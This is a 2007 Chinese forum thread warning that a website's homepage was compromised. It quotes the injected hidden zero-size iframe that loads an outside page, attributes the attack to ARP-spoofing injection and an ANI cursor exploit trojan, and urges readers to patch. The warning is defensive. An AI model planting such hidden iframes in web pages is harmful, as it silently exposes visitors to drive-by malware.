注意!小站主页确实有毒【已清除】
查看源代码,可以看到这么一行代码:[code]<iframe src=http://WWW.86DX.NET/bb.htm width=0 height=0></iframe>[/code]
初步估计是ARP欺骗挂马。
请不要点击上面的链接。
NOD32 以及 McAfee 反病毒软件报告存在病毒。
请大家注意。
希望小站站长或相关管理人员联系你们的机房处理。查找感染ARP欺骗蠕虫的机器。
@22:00:00
已清除了。
[[i] 本帖最后由 Aka 于 2007-6-24 22:10 编辑 [/i]]
进一步分析
属于光标漏洞木马2007-6-24 18:09:39 已删除 ZXAFFDASDADQ\Administrator flashget.exe G:\Downloads\9.js.jc! Exploit-ANIfile.c (特洛伊) **** 作者被禁止或删除 内容自动屏蔽 **** 只要你安装了微软的光标漏洞补丁,就不用担心。
如果你的机器没有安装补丁,快到微软的主页上下载补丁安装吧。 [url]http://bbs.rohome.net/viewthread.php?tid=790857&highlight=%2Bdarkmomo[/url]
恶意连接[233]
恩,正经说一句,是大可摸摸提供的补丁连接 呃。。。那之后似乎还出现过几次变种ANI病毒。
还是用专业的杀毒软件看看吧。 论坛没有吧……
页:
[1]